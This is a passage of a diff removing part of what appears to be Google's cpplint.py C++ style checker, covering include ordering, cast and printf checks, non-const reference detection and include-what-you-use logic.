_RE_PATTERN_INCLUDE_NEW_STYLE.search(line): - error(filename, linenum, 'build/include', 4, - 'Include the directory when naming .h files') - - # we shouldn't include a file more than once. actually, there are a - # handful of instances where doing so is okay, but in general it's - # not. - match = _RE_PATTERN_INCLUDE.search(line) - if match: - include = match.group(2) - is_system = (match.group(1) == '<') - if include in include_state: - error(filename, linenum, 'build/include', 4, - '"%s" already included at %s:%s' % - (include, filename, include_state[include])) - else: - include_state[include] = linenum - - # We want to ensure that headers appear in the right order: - # 1) for foo.cc, foo.h (preferred location) - # 2) c system files - # 3) cpp system files - # 4) for foo.cc, foo.h (deprecated location) - # 5) other google headers - # - # We classify each include statement as one of those 5 types - # using a number of techniques. The include_state object keeps - # track of the highest type seen, and complains if we see a - # lower type after that. - error_message = include_state.CheckNextIncludeOrder( - _ClassifyInclude(fileinfo, include, is_system)) - if error_message: - error(filename, linenum, 'build/include_order', 4, - '%s. Should be: %s.h, c system, c++ system, other.' 
% - (error_message, fileinfo.BaseName())) - canonical_include = include_state.CanonicalizeAlphabeticalOrder(include) - if not include_state.IsInAlphabeticalOrder( - clean_lines, linenum, canonical_include): - error(filename, linenum, 'build/include_alpha', 4, - 'Include "%s" not in alphabetical order' % include) - include_state.SetLastHeader(canonical_include) - - # Look for any of the stream classes that are part of standard C++. - match = _RE_PATTERN_INCLUDE.match(line) - if match: - include = match.group(2) - if Match(r'(f|ind|io|i|o|parse|pf|stdio|str|)?stream$', include): - # Many unit tests use cout, so we exempt them. - if not _IsTestFilename(filename): - error(filename, linenum, 'readability/streams', 3, - 'Streams are highly discouraged.') - - -def _GetTextInside(text, start_pattern): - r"""Retrieves all the text between matching open and close parentheses. - - Given a string of lines and a regular expression string, retrieve all the text - following the expression and between opening punctuation symbols like - (, [, or {, and the matching close-punctuation symbol. This properly nested - occurrences of the punctuations, so for the text like - printf(a(), b(c())); - a call to _GetTextInside(text, r'printf\(') will return 'a(), b(c())'. - start_pattern must match string having an open punctuation symbol at the end. - - Args: - text: The lines to extract text. Its comments and strings must be elided. - It can be single line and can span multiple lines. - start_pattern: The regexp string indicating where to start extracting - the text. - Returns: - The extracted text. - None if either the opening string or ending punctuation could not be found. - """ - # TODO(sugawarayu): Audit cpplint.py to see what places could be profitably - # rewritten to use _GetTextInside (and use inferior regexp matching today). - - # Give opening punctuations to get the matching close-punctuations. - matching_punctuation = {'(': ')', '{': '}', '[': ']'} - closing_punctuation = set(matching_punctuation.itervalues()) - - # Find the position to start extracting text. - match = re.search(start_pattern, text, re.M) - if not match: # start_pattern not found in text. - return None - start_position = match.end(0) - - assert start_position > 0, ( - 'start_pattern must ends with an opening punctuation.') - assert text[start_position - 1] in matching_punctuation, ( - 'start_pattern must ends with an opening punctuation.') - # Stack of closing punctuations we expect to have in text after position. - punctuation_stack = [matching_punctuation[text[start_position - 1]]] - position = start_position - while punctuation_stack and position < len(text): - if text[position] == punctuation_stack[-1]: - punctuation_stack.pop() - elif text[position] in closing_punctuation: - # A closing punctuation without matching opening punctuations. - return None - elif text[position] in matching_punctuation: - punctuation_stack.append(matching_punctuation[text[position]]) - position += 1 - if punctuation_stack: - # Opening punctuations left without matching close-punctuations. - return None - # punctuations match. - return text[start_position:position - 1] - - -# Patterns for matching call-by-reference parameters. -# -# Supports nested templates up to 2 levels deep using this messy pattern: -# < (?: < (?: < [^<>]* -# > -# | [^<>] )* -# > -# | [^<>] )* -# > -_RE_PATTERN_IDENT = r'[_a-zA-Z]\w*' # =~ [[:alpha:]][[:alnum:]]* -_RE_PATTERN_TYPE = ( - r'(?:const\s+)?(?:typename\s+|class\s+|struct\s+|union\s+|enum\s+)?' 
- r'(?:\w|' - r'\s*<(?:<(?:<[^<>]*>|[^<>])*>|[^<>])*>|' - r'::)+') -# A call-by-reference parameter ends with '& identifier'. -_RE_PATTERN_REF_PARAM = re.compile( - r'(' + _RE_PATTERN_TYPE + r'(?:\s*(?:\bconst\b|[*]))*\s*' - r'&\s*' + _RE_PATTERN_IDENT + r')\s*(?:=[^,()]+)?[,)]') -# A call-by-const-reference parameter either ends with 'const& identifier' -# or looks like 'const type& identifier' when 'type' is atomic. -_RE_PATTERN_CONST_REF_PARAM = ( - r'(?:.*\s*\bconst\s*&\s*' + _RE_PATTERN_IDENT + - r'|const\s+' + _RE_PATTERN_TYPE + r'\s*&\s*' + _RE_PATTERN_IDENT + r')') - - -def CheckLanguage(filename, clean_lines, linenum, file_extension, - include_state, nesting_state, error): - """Checks rules from the 'C++ language rules' section of cppguide.html. - - Some of these rules are hard to test (function overloading, using - uint32 inappropriately), but we do the best we can. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - file_extension: The extension (without the dot) of the filename. - include_state: An _IncludeState instance in which the headers are inserted. - nesting_state: A _NestingState instance which maintains information about - the current stack of nested blocks being parsed. - error: The function to call with any errors found. - """ - # If the line is empty or consists of entirely a comment, no need to - # check it. - line = clean_lines.elided[linenum] - if not line: - return - - match = _RE_PATTERN_INCLUDE.search(line) - if match: - CheckIncludeLine(filename, clean_lines, linenum, include_state, error) - return - - # Reset include state across preprocessor directives. This is meant - # to silence warnings for conditional includes. - if Match(r'^\s*#\s*(?:ifdef|elif|else|endif)\b', line): - include_state.ResetSection() - - # Make Windows paths like Unix. - fullname = os.path.abspath(filename).replace('\\', '/') - - # TODO(unknown): figure out if they're using default arguments in fn proto. - - # Check to see if they're using an conversion function cast. - # I just try to capture the most common basic types, though there are more. - # Parameterless conversion functions, such as bool(), are allowed as they are - # probably a member operator declaration or default constructor. - match = Search( - r'(\bnew\s+)?\b' # Grab 'new' operator, if it's there - r'(int|float|double|bool|char|int32|uint32|int64|uint64)' - r'(\([^)].*)', line) - if match: - matched_new = match.group(1) - matched_type = match.group(2) - matched_funcptr = match.group(3) - - # gMock methods are defined using some variant of MOCK_METHODx(name, type) - # where type may be float(), int(string), etc. Without context they are - # virtually indistinguishable from int(x) casts. Likewise, gMock's - # MockCallback takes a template parameter of the form return_type(arg_type), - # which looks much like the cast we're trying to detect. - # - # std::function<> wrapper has a similar problem. - # - # Return types for function pointers also look like casts if they - # don't have an extra space. 
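In isolation, the conversion-cast pattern above behaves like this (plain re, standalone samples):

import re

cast = re.compile(r'(\bnew\s+)?\b'
                  r'(int|float|double|bool|char|int32|uint32|int64|uint64)'
                  r'(\([^)].*)')
m = cast.search('int x = int(3.5);')
assert m and m.group(2) == 'int'                  # -> suggest static_cast<int>(...)
assert cast.search('p = new int(3);').group(1)    # 'new ' captured -> not a cast
assert not cast.search('return bool();')          # parameterless bool() is allowed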
- if (matched_new is None and # If new operator, then this isn't a cast - not (Match(r'^\s*MOCK_(CONST_)?METHOD\d+(_T)?\(', line) or - Search(r'\bMockCallback<.*>', line) or - Search(r'\bstd::function<.*>', line)) and - not (matched_funcptr and - Match(r'\((?:[^() ]+::\s*\*\s*)?[^() ]+\)\s*\(', - matched_funcptr))): - # Try a bit harder to catch gmock lines: the only place where - # something looks like an old-style cast is where we declare the - # return type of the mocked method, and the only time when we - # are missing context is if MOCK_METHOD was split across - # multiple lines. The missing MOCK_METHOD is usually one or two - # lines back, so scan back one or two lines. - # - # It's not possible for gmock macros to appear in the first 2 - # lines, since the class head + section name takes up 2 lines. - if (linenum < 2 or - not (Match(r'^\s*MOCK_(?:CONST_)?METHOD\d+(?:_T)?\((?:\S+,)?\s*$', - clean_lines.elided[linenum - 1]) or - Match(r'^\s*MOCK_(?:CONST_)?METHOD\d+(?:_T)?\(\s*$', - clean_lines.elided[linenum - 2]))): - error(filename, linenum, 'readability/casting', 4, - 'Using deprecated casting style. ' - 'Use static_cast<%s>(...) instead' % - matched_type) - - CheckCStyleCast(filename, linenum, line, clean_lines.raw_lines[linenum], - 'static_cast', - r'\((int|float|double|bool|char|u?int(16|32|64))\)', error) - - # This doesn't catch all cases. Consider (const char * const)"hello". - # - # (char *) "foo" should always be a const_cast (reinterpret_cast won't - # compile). - if CheckCStyleCast(filename, linenum, line, clean_lines.raw_lines[linenum], - 'const_cast', r'\((char\s?\*+\s?)\)\s*"', error): - pass - else: - # Check pointer casts for other than string constants - CheckCStyleCast(filename, linenum, line, clean_lines.raw_lines[linenum], - 'reinterpret_cast', r'\((\w+\s?\*+\s?)\)', error) - - # In addition, we look for people taking the address of a cast. This - # is dangerous -- casts can assign to temporaries, so the pointer doesn't - # point where you think. - match = Search( - r'(?:&\(([^)]+)\)[\w(])|' - r'(?:&(static|dynamic|down|reinterpret)_cast\b)', line) - if match and match.group(1) != '*': - error(filename, linenum, 'runtime/casting', 4, - ('Are you taking an address of a cast? ' - 'This is dangerous: could be a temp var. ' - 'Take the address before doing the cast, rather than after')) - - # Create an extended_line, which is the concatenation of the current and - # next lines, for more effective checking of code that may span more than one - # line. - if linenum + 1 < clean_lines.NumLines(): - extended_line = line + clean_lines.elided[linenum + 1] - else: - extended_line = line - - # Check for people declaring static/global STL strings at the top level. - # This is dangerous because the C++ language does not guarantee that - # globals with constructors are initialized before the first access. - match = Match( - r'((?:|static +)(?:|const +))string +([a-zA-Z0-9_:]+)\b(.*)', - line) - # Make sure it's not a function. - # Function template specialization looks like: "string foo(...". - # Class template definitions look like: "string Foo::Method(...". - # - # Also ignore things that look like operators. These are matched separately - # because operator names cross non-word boundaries. If we change the pattern - # above, we would decrease the accuracy of matching identifiers. 
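And the static/global string pattern in isolation (standalone re; the surrounding check additionally rules out function declarations by inspecting group 3):

import re

pat = re.compile(r'((?:|static +)(?:|const +))string +([a-zA-Z0-9_:]+)\b(.*)')
m = pat.match('static const string kName = "foo";')
assert m and m.group(1) == 'static const ' and m.group(2) == 'kName'
# -> 'For a static/global string constant, use a C style string instead:
#     "static const char kName[]".'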
- if (match and - not Search(r'\boperator\W', line) and - not Match(r'\s*(<.*>)?(::[a-zA-Z0-9_]+)?\s*\(([^"]|$)', match.group(3))): - error(filename, linenum, 'runtime/string', 4, - 'For a static/global string constant, use a C style string instead: ' - '"%schar %s[]".' % - (match.group(1), match.group(2))) - - if Search(r'\b([A-Za-z0-9_]*_)\(\1\)', line): - error(filename, linenum, 'runtime/init', 4, - 'You seem to be initializing a member variable with itself.') - - if file_extension == 'h': - # TODO(unknown): check that 1-arg constructors are explicit. - # How to tell it's a constructor? - # (handled in CheckForNonStandardConstructs for now) - # TODO(unknown): check that classes have DISALLOW_EVIL_CONSTRUCTORS - # (level 1 error) - pass - - # Check if people are using the verboten C basic types. The only exception - # we regularly allow is "unsigned short port" for port. - if Search(r'\bshort port\b', line): - if not Search(r'\bunsigned short port\b', line): - error(filename, linenum, 'runtime/int', 4, - 'Use "unsigned short" for ports, not "short"') - else: - match = Search(r'\b(short|long(?! +double)|long long)\b', line) - if match: - error(filename, linenum, 'runtime/int', 4, - 'Use int16/int64/etc, rather than the C type %s' % match.group(1)) - - # When snprintf is used, the second argument shouldn't be a literal. - match = Search(r'snprintf\s*\(([^,]*),\s*([0-9]*)\s*,', line) - if match and match.group(2) != '0': - # If 2nd arg is zero, snprintf is used to calculate size. - error(filename, linenum, 'runtime/printf', 3, - 'If you can, use sizeof(%s) instead of %s as the 2nd arg ' - 'to snprintf.' % (match.group(1), match.group(2))) - - # Check if some verboten C functions are being used. - if Search(r'\bsprintf\b', line): - error(filename, linenum, 'runtime/printf', 5, - 'Never use sprintf. Use snprintf instead.') - match = Search(r'\b(strcpy|strcat)\b', line) - if match: - error(filename, linenum, 'runtime/printf', 4, - 'Almost always, snprintf is better than %s' % match.group(1)) - - # Check if some verboten operator overloading is going on - # TODO(unknown): catch out-of-line unary operator&: - # class X {}; - # int operator&(const X& x) { return 42; } // unary operator& - # The trick is it's hard to tell apart from binary operator&: - # class Y { int operator&(const Y& x) { return 23; } }; // binary operator& - if Search(r'\boperator\s*&\s*\(\s*\)', line): - error(filename, linenum, 'runtime/operator', 4, - 'Unary operator& is dangerous. Do not use it.') - - # Check for suspicious usage of "if" like - # } if (a == b) { - if Search(r'\}\s*if\s*\(', line): - error(filename, linenum, 'readability/braces', 4, - 'Did you mean "else if"? If not, start a new line for "if".') - - # Check for potential format string bugs like printf(foo). - # We constrain the pattern not to pick things like DocidForPrintf(foo). - # Not perfect but it can catch printf(foo.c_str()) and printf(foo->c_str()) - # TODO(sugawarayu): Catch the following case. Need to change the calling - # convention of the whole function to process multiple line to handle it. - # printf( - # boy_this_is_a_really_long_variable_that_cannot_fit_on_the_prev_line); - printf_args = _GetTextInside(line, r'(?i)\b(string)?printf\s*\(') - if printf_args: - match = Match(r'([\w.\->()]+)$', printf_args) - if match and match.group(1) != '__VA_ARGS__': - function_name = re.search(r'\b((?:string)?printf)\s*\(', - line, re.I).group(1) - error(filename, linenum, 'runtime/printf', 4, - 'Potential format string bug. Do %s("%%s", %s) instead.' 
- % (function_name, match.group(1))) - - # Check for potential memset bugs like memset(buf, sizeof(buf), 0). - match = Search(r'memset\s*\(([^,]*),\s*([^,]*),\s*0\s*\)', line) - if match and not Match(r"^''|-?[0-9]+|0x[0-9A-Fa-f]$", match.group(2)): - error(filename, linenum, 'runtime/memset', 4, - 'Did you mean "memset(%s, 0, %s)"?' - % (match.group(1), match.group(2))) - - if Search(r'\busing namespace\b', line): - error(filename, linenum, 'build/namespaces', 5, - 'Do not use namespace using-directives. ' - 'Use using-declarations instead.') - - # Detect variable-length arrays. - match = Match(r'\s*(.+::)?(\w+) [a-z]\w*\[(.+)];', line) - if (match and match.group(2) != 'return' and match.group(2) != 'delete' and - match.group(3).find(']') == -1): - # Split the size using space and arithmetic operators as delimiters. - # If any of the resulting tokens are not compile time constants then - # report the error. - tokens = re.split(r'\s|\+|\-|\*|\/|<<|>>]', match.group(3)) - is_const = True - skip_next = False - for tok in tokens: - if skip_next: - skip_next = False - continue - - if Search(r'sizeof\(.+\)', tok): continue - if Search(r'arraysize\(\w+\)', tok): continue - - tok = tok.lstrip('(') - tok = tok.rstrip(')') - if not tok: continue - if Match(r'\d+', tok): continue - if Match(r'0[xX][0-9a-fA-F]+', tok): continue - if Match(r'k[A-Z0-9]\w*', tok): continue - if Match(r'(.+::)?k[A-Z0-9]\w*', tok): continue - if Match(r'(.+::)?[A-Z][A-Z0-9_]*', tok): continue - # A catch all for tricky sizeof cases, including 'sizeof expression', - # 'sizeof(*type)', 'sizeof(const type)', 'sizeof(struct StructName)' - # requires skipping the next token because we split on ' ' and '*'. - if tok.startswith('sizeof'): - skip_next = True - continue - is_const = False - break - if not is_const: - error(filename, linenum, 'runtime/arrays', 1, - 'Do not use variable-length arrays. Use an appropriately named ' - "('k' followed by CamelCase) compile-time constant for the size.") - - # If DISALLOW_EVIL_CONSTRUCTORS, DISALLOW_COPY_AND_ASSIGN, or - # DISALLOW_IMPLICIT_CONSTRUCTORS is present, then it should be the last thing - # in the class declaration. - match = Match( - (r'\s*' - r'(DISALLOW_(EVIL_CONSTRUCTORS|COPY_AND_ASSIGN|IMPLICIT_CONSTRUCTORS))' - r'\(.*\);$'), - line) - if match and linenum + 1 < clean_lines.NumLines(): - next_line = clean_lines.elided[linenum + 1] - # We allow some, but not all, declarations of variables to be present - # in the statement that defines the class. The [\w\*,\s]* fragment of - # the regular expression below allows users to declare instances of - # the class or pointers to instances, but not less common types such - # as function pointers or arrays. It's a tradeoff between allowing - # reasonable code and avoiding trying to parse more C++ using regexps. - if not Search(r'^\s*}[\w\*,\s]*;', next_line): - error(filename, linenum, 'readability/constructors', 3, - match.group(1) + ' should be the last thing in the class') - - # Check for use of unnamed namespaces in header files. Registration - # macros are typically OK, so we allow use of "namespace {" on lines - # that end with backslashes. - if (file_extension == 'h' - and Search(r'\bnamespace\s*{', line) - and line[-1] != '\\'): - error(filename, linenum, 'build/namespaces', 4, - 'Do not use unnamed namespaces in header files. 
See ' - 'http://google-styleguide.googlecode.com/svn/trunk/cppguide.xml#Namespaces' - ' for more information.') - -def CheckForNonConstReference(filename, clean_lines, linenum, - nesting_state, error): - """Check for non-const references. - - Separate from CheckLanguage since it scans backwards from current - line, instead of scanning forward. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - nesting_state: A _NestingState instance which maintains information about - the current stack of nested blocks being parsed. - error: The function to call with any errors found. - """ - # Do nothing if there is no '&' on current line. - line = clean_lines.elided[linenum] - if '&' not in line: - return - - # Long type names may be broken across multiple lines, usually in one - # of these forms: - # LongType - # ::LongTypeContinued &identifier - # LongType:: - # LongTypeContinued &identifier - # LongType< - # ...>::LongTypeContinued &identifier - # - # If we detected a type split across two lines, join the previous - # line to current line so that we can match const references - # accordingly. - # - # Note that this only scans back one line, since scanning back - # arbitrary number of lines would be expensive. If you have a type - # that spans more than 2 lines, please use a typedef. - if linenum > 1: - previous = None - if Match(r'\s*::(?:[\w<>]|::)+\s*&\s*\S', line): - # previous_line\n + ::current_line - previous = Search(r'\b((?:const\s*)?(?:[\w<>]|::)+[\w<>])\s*$', - clean_lines.elided[linenum - 1]) - elif Match(r'\s*[a-zA-Z_]([\w<>]|::)+\s*&\s*\S', line): - # previous_line::\n + current_line - previous = Search(r'\b((?:const\s*)?(?:[\w<>]|::)+::)\s*$', - clean_lines.elided[linenum - 1]) - if previous: - line = previous.group(1) + line.lstrip() - else: - # Check for templated parameter that is split across multiple lines - endpos = line.rfind('>') - if endpos > -1: - (_, startline, startpos) = ReverseCloseExpression( - clean_lines, linenum, endpos) - if startpos > -1 and startline < linenum: - # Found the matching < on an earlier line, collect all - # pieces up to current line. - line = '' - for i in xrange(startline, linenum + 1): - line += clean_lines.elided[i].strip() - - # Check for non-const references in function parameters. A single '&' may - # found in the following places: - # inside expression: binary & for bitwise AND - # inside expression: unary & for taking the address of something - # inside declarators: reference parameter - # We will exclude the first two cases by checking that we are not inside a - # function body, including one that was just introduced by a trailing '{'. - # TODO(unknwon): Doesn't account for preprocessor directives. - # TODO(unknown): Doesn't account for 'catch(Exception& e)' [rare]. - check_params = False - if not nesting_state.stack: - check_params = True # top level - elif (isinstance(nesting_state.stack[-1], _ClassInfo) or - isinstance(nesting_state.stack[-1], _NamespaceInfo)): - check_params = True # within class or namespace - elif Match(r'.*{\s*$', line): - if (len(nesting_state.stack) == 1 or - isinstance(nesting_state.stack[-2], _ClassInfo) or - isinstance(nesting_state.stack[-2], _NamespaceInfo)): - check_params = True # just opened global/class/namespace block - # We allow non-const references in a few standard places, like functions - # called "swap()" or iostream operators like "<<" or ">>". Do not check - # those function parameters. 
- # - # We also accept & in static_assert, which looks like a function but - # it's actually a declaration expression. - whitelisted_functions = (r'(?:[sS]wap(?:<\w:+>)?|' - r'operator\s*[<>][<>]|' - r'static_assert|COMPILE_ASSERT' - r')\s*\(') - if Search(whitelisted_functions, line): - check_params = False - elif not Search(r'\S+\([^)]*$', line): - # Don't see a whitelisted function on this line. Actually we - # didn't see any function name on this line, so this is likely a - # multi-line parameter list. Try a bit harder to catch this case. - for i in xrange(2): - if (linenum > i and - Search(whitelisted_functions, clean_lines.elided[linenum - i - 1])): - check_params = False - break - - if check_params: - decls = ReplaceAll(r'{[^}]*}', ' ', line) # exclude function body - for parameter in re.findall(_RE_PATTERN_REF_PARAM, decls): - if not Match(_RE_PATTERN_CONST_REF_PARAM, parameter): - error(filename, linenum, 'runtime/references', 2, - 'Is this a non-const reference? ' - 'If so, make const or use a pointer: ' + - ReplaceAll(' *<', '<', parameter)) - - -def CheckCStyleCast(filename, linenum, line, raw_line, cast_type, pattern, - error): - """Checks for a C-style cast by looking for the pattern. - - Args: - filename: The name of the current file. - linenum: The number of the line to check. - line: The line of code to check. - raw_line: The raw line of code to check, with comments. - cast_type: The string for the C++ cast to recommend. This is either - reinterpret_cast, static_cast, or const_cast, depending. - pattern: The regular expression used to find C-style casts. - error: The function to call with any errors found. - - Returns: - True if an error was emitted. - False otherwise. - """ - match = Search(pattern, line) - if not match: - return False - - # Exclude lines with sizeof, since sizeof looks like a cast. - sizeof_match = Match(r'.*sizeof\s*$', line[0:match.start(1) - 1]) - if sizeof_match: - return False - - # operator++(int) and operator--(int) - if (line[0:match.start(1) - 1].endswith(' operator++') or - line[0:match.start(1) - 1].endswith(' operator--')): - return False - - # A single unnamed argument for a function tends to look like old - # style cast. If we see those, don't issue warnings for deprecated - # casts, instead issue warnings for unnamed arguments where - # appropriate. - # - # These are things that we want warnings for, since the style guide - # explicitly require all parameters to be named: - # Function(int); - # Function(int) { - # ConstMember(int) const; - # ConstMember(int) const { - # ExceptionMember(int) throw (...); - # ExceptionMember(int) throw (...) { - # PureVirtual(int) = 0; - # - # These are functions of some sort, where the compiler would be fine - # if they had named parameters, but people often omit those - # identifiers to reduce clutter: - # (FunctionPointer)(int); - # (FunctionPointer)(int) = value; - # Function((function_pointer_arg)(int)) - # ; - # <(FunctionPointerTemplateArgument)(int)>; - remainder = line[match.end(0):] - if Match(r'^\s*(?:;|const\b|throw\b|=|>|\{|\))', remainder): - # Looks like an unnamed parameter. - - # Don't warn on any kind of template arguments. - if Match(r'^\s*>', remainder): - return False - - # Don't warn on assignments to function pointers, but keep warnings for - # unnamed parameters to pure virtual functions. Note that this pattern - # will also pass on assignments of "0" to function pointers, but the - # preferred values for those would be "nullptr" or "NULL". 
-    matched_zero = Match(r'^\s=\s*(\S+)\s*;', remainder)
-    if matched_zero and matched_zero.group(1) != '0':
-      return False
-
-    # Don't warn on function pointer declarations. For this we need
-    # to check what came before the "(type)" string.
-    if Match(r'.*\)\s*$', line[0:match.start(0)]):
-      return False
-
-    # Don't warn if the parameter is named with block comments, e.g.:
-    #  Function(int /*unused_param*/);
-    if '/*' in raw_line:
-      return False
-
-    # Passed all filters, issue warning here.
-    error(filename, linenum, 'readability/function', 3,
-          'All parameters should be named in a function')
-    return True
-
-  # At this point, all that should be left is actual casts.
-  error(filename, linenum, 'readability/casting', 4,
-        'Using C-style cast. Use %s<%s>(...) instead' %
-        (cast_type, match.group(1)))
-
-  return True
-
-
-_HEADERS_CONTAINING_TEMPLATES = (
-    ('<deque>', ('deque',)),
-    ('<functional>', ('unary_function', 'binary_function',
-                      'plus', 'minus', 'multiplies', 'divides', 'modulus',
-                      'negate',
-                      'equal_to', 'not_equal_to', 'greater', 'less',
-                      'greater_equal', 'less_equal',
-                      'logical_and', 'logical_or', 'logical_not',
-                      'unary_negate', 'not1', 'binary_negate', 'not2',
-                      'bind1st', 'bind2nd',
-                      'pointer_to_unary_function',
-                      'pointer_to_binary_function',
-                      'ptr_fun',
-                      'mem_fun_t', 'mem_fun', 'mem_fun1_t', 'mem_fun1_ref_t',
-                      'mem_fun_ref_t',
-                      'const_mem_fun_t', 'const_mem_fun1_t',
-                      'const_mem_fun_ref_t', 'const_mem_fun1_ref_t',
-                      'mem_fun_ref',
-                     )),
-    ('<limits>', ('numeric_limits',)),
-    ('<list>', ('list',)),
-    ('<map>', ('map', 'multimap',)),
-    ('<memory>', ('allocator',)),
-    ('<queue>', ('queue', 'priority_queue',)),
-    ('<set>', ('set', 'multiset',)),
-    ('<stack>', ('stack',)),
-    ('<string>', ('char_traits', 'basic_string',)),
-    ('<utility>', ('pair',)),
-    ('<vector>', ('vector',)),
-
-    # gcc extensions.
-    # Note: std::hash is their hash, ::hash is our hash
-    ('<hash_map>', ('hash_map', 'hash_multimap',)),
-    ('<hash_set>', ('hash_set', 'hash_multiset',)),
-    ('<slist>', ('slist',)),
-    )
-
-_RE_PATTERN_STRING = re.compile(r'\bstring\b')
-
-_re_pattern_algorithm_header = []
-for _template in ('copy', 'max', 'min', 'min_element', 'sort', 'swap',
-                  'transform'):
-  # Match max<type>(..., ...), max(..., ...), but not foo->max, foo.max or
-  # type::max().
-  _re_pattern_algorithm_header.append(
-      (re.compile(r'[^>.]\b' + _template + r'(<.*?>)?\([^\)]'),
-       _template,
-       '<algorithm>'))
-
-_re_pattern_templates = []
-for _header, _templates in _HEADERS_CONTAINING_TEMPLATES:
-  for _template in _templates:
-    _re_pattern_templates.append(
-        (re.compile(r'(\<|\b)' + _template + r'\s*\<'),
-         _template + '<>',
-         _header))
-
-
-def FilesBelongToSameModule(filename_cc, filename_h):
-  """Check if these two filenames belong to the same module.
-
-  The concept of a 'module' here is as follows:
-  foo.h, foo-inl.h, foo.cc, foo_test.cc and foo_unittest.cc belong to the
-  same 'module' if they are in the same directory.
-  some/path/public/xyzzy and some/path/internal/xyzzy are also considered
-  to belong to the same module here.
-
-  If the filename_cc contains a longer path than the filename_h, for example,
-  '/absolute/path/to/base/sysinfo.cc', and this file would include
-  'base/sysinfo.h', this function also produces the prefix needed to open the
-  header. This is used by the caller of this function to more robustly open the
-  header file. We don't have access to the real include paths in this context,
-  so we need this guesswork here.
-
-  Known bugs: tools/base/bar.cc and base/bar.h belong to the same module
-  according to this implementation. Because of this, this function gives
-  some false positives. This should be sufficiently rare in practice.
-
-  Args:
-    filename_cc: is the path for the .cc file
-    filename_h: is the path for the header path
-
-  Returns:
-    Tuple with a bool and a string:
-    bool: True if filename_cc and filename_h belong to the same module.
-    string: the additional prefix needed to open the header file.
-  """
-
-  if not filename_cc.endswith('.cc'):
-    return (False, '')
-  filename_cc = filename_cc[:-len('.cc')]
-  if filename_cc.endswith('_unittest'):
-    filename_cc = filename_cc[:-len('_unittest')]
-  elif filename_cc.endswith('_test'):
-    filename_cc = filename_cc[:-len('_test')]
-  filename_cc = filename_cc.replace('/public/', '/')
-  filename_cc = filename_cc.replace('/internal/', '/')
-
-  if not filename_h.endswith('.h'):
-    return (False, '')
-  filename_h = filename_h[:-len('.h')]
-  if filename_h.endswith('-inl'):
-    filename_h = filename_h[:-len('-inl')]
-  filename_h = filename_h.replace('/public/', '/')
-  filename_h = filename_h.replace('/internal/', '/')
-
-  files_belong_to_same_module = filename_cc.endswith(filename_h)
-  common_path = ''
-  if files_belong_to_same_module:
-    common_path = filename_cc[:-len(filename_h)]
-  return files_belong_to_same_module, common_path
-
-
-def UpdateIncludeState(filename, include_state, io=codecs):
-  """Fill up the include_state with new includes found from the file.
-
-  Args:
-    filename: the name of the header to read.
-    include_state: an _IncludeState instance in which the headers are inserted.
-    io: The io factory to use to read the file. Provided for testability.
-
-  Returns:
-    True if a header was successfully added. False otherwise.
-  """
-  headerfile = None
-  try:
-    headerfile = io.open(filename, 'r', 'utf8', 'replace')
-  except IOError:
-    return False
-  linenum = 0
-  for line in headerfile:
-    linenum += 1
-    clean_line = CleanseComments(line)
-    match = _RE_PATTERN_INCLUDE.search(clean_line)
-    if match:
-      include = match.group(2)
-      # The value formatting is cute, but not really used right now.
-      # What matters here is that the key is in include_state.
-      include_state.setdefault(include, '%s:%d' % (filename, linenum))
-  return True
-
-
-def CheckForIncludeWhatYouUse(filename, clean_lines, include_state, error,
-                              io=codecs):
-  """Reports for missing stl includes.
-
-  This function will output warnings to make sure you are including the headers
-  necessary for the stl containers and functions that you use. We only give one
-  reason to include a header. For example, if you use both equal_to<> and
-  less<> in a .h file, only one (the latter in the file) of these will be
-  reported as a reason to include the <functional>.
-
-  Args:
-    filename: The name of the current file.
-    clean_lines: A CleansedLines instance containing the file.
-    include_state: An _IncludeState instance.
-    error: The function to call with any errors found.
-    io: The IO factory to use to read the header file. Provided for unittest
-        injection.
-  """
-  required = {}  # A map of header name to linenumber and the template entity.
-                 # Example of required: { '<functional>': (1219, 'less<>') }
-
-  for linenum in xrange(clean_lines.NumLines()):
-    line = clean_lines.elided[linenum]
-    if not line or line[0] == '#':
-      continue
-
-    # String is special -- it is a non-templatized type in STL.
-    matched = _RE_PATTERN_STRING.search(line)
-    if matched:
-      # Don't warn about strings in non-STL namespaces:
-      # (We check only the first match per line; good enough.)
-      prefix = line[:matched.start()]
-      if prefix.endswith('std::') or not prefix.endswith('::'):
-        required['<string>'] = (linenum, 'string')
-
-    for pattern, template, header in _re_pattern_algorithm_header:
-      if pattern.search(line):
-        required[header] = (linenum, template)
-
-    # The following function is just a speed up, no semantics are changed.
-    if not '<' in line:  # Reduces the cpu time usage by skipping lines.
-      continue
-
-    for pattern, template, header in _re_pattern_templates:
-      if pattern.search(line):
-        required[header] = (linenum, template)
-
-  # The policy is that if you #include something in foo.h you don't need to
-  # include it again in foo.cc. Here, we will look at possible includes.
-  # Let's copy the include_state so it is only messed up within this function.
-  include_state = include_state.copy()
-
-  # Did we find the header for this file (if any) and successfully load it?
-  header_found = False
-
-  # Use the absolute path so that matching works properly.
-  abs_filename = FileInfo(filename).FullName()
-
-  # For Emacs's flymake.
-  # If cpplint is invoked from Emacs's flymake, a temporary file is generated
-  # by flymake and that file name might end with '_flymake.cc'. In that case,
-  # restore original file name here so that the corresponding header file can be
-  # found.
-  # e.g. If the file name is 'foo_flymake.cc', we should search for 'foo.h'
-  # instead of 'foo_flymake.h'
-  abs_filename = re.sub(r'_flymake\.cc$', '.cc', abs_filename)
-
-  # include_state is modified during iteration, so we iterate over a copy of
-  # the keys.
-  header_keys = include_state.keys()
-  for header in header_keys:
-    (same_module, common_path) = FilesBelongToSameModule(abs_filename, header)
-    fullpath = common_path + header
-    if same_module and UpdateIncludeState(fullpath, include_state, io):
-      header_found = True
-
-  # If we can't find the header file for a .cc, assume it's because we don't
-  # know where to look. In that case we'll give up as we're not sure they
-  # didn't include it in the .h file.
-  # TODO(unknown): Do a better job of finding .h files so we are confident that
-  # not having the .h file means there isn't one.
-  if filename.endswith('.cc') and not header_found:
-    return
-
-  # All the lines have been processed, report the errors found.
-  for required_header_unstripped in required:
-    template = required[required_header_unstripped][1]
-    if required_header_unstripped.strip('<>"') not in include_state:
-      error(filename, required[required_header_unstripped][0],
-            'build/include_what_you_use', 4,
-            'Add #include ' + required_header_unstripped + ' for ' + template)
-
-
-_RE_PATTERN_EXPLICIT_MAKEPAIR = re.compile(r'\bmake_pair\s*<')
-
-
